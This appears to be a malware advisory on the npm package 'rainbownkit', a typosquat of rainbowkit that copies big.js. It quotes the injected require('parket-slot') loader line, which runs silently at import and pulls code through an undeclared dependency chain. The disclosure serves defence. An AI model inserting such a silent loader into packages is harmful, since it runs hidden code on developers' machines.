rainbownkit @0.0.8

Summary

Package 'rainbownkit' is a single-character typosquat of the popular Web3 library 'rainbowkit'. The shipped source, README, repository URL, and author metadata are copied verbatim from the unrelated 'big.js' arbitrary-precision math library — a developer installing this expecting RainbowKit instead receives big.js with an injected covert loader. The package's main entry (big.js and big.mjs, both referenced via main and exports ) contains an injected try/catch around line 606 that runs at require/import time: const doc = require("parket-slot"); doc.from_str().then(e => {}).catch(e => {}) . The 'parket-slot' module is not declared in package.json and would be pulled in transitively via the package's only declared runtime dependency 'log-taker' ( ^0.0.9 ), an undocumented niche package with no relation to the package's claimed purpose. All errors are silently swallowed, making the hidden execution invisible to the consumer. Anyone who runs require('rainbownkit') (or any code that imports it) executes whatever code the 'parket-slot' / 'log-taker' chain delivers at that moment — a classic two-hop dependency-confusion supply-chain payload combined with name impersonation of a high-traffic Web3 package.

Source: amazon-inspector (970be1fb6306ff1e8dc6119d96404f600a1eb44a47124e2910bb9237bb80fe9a)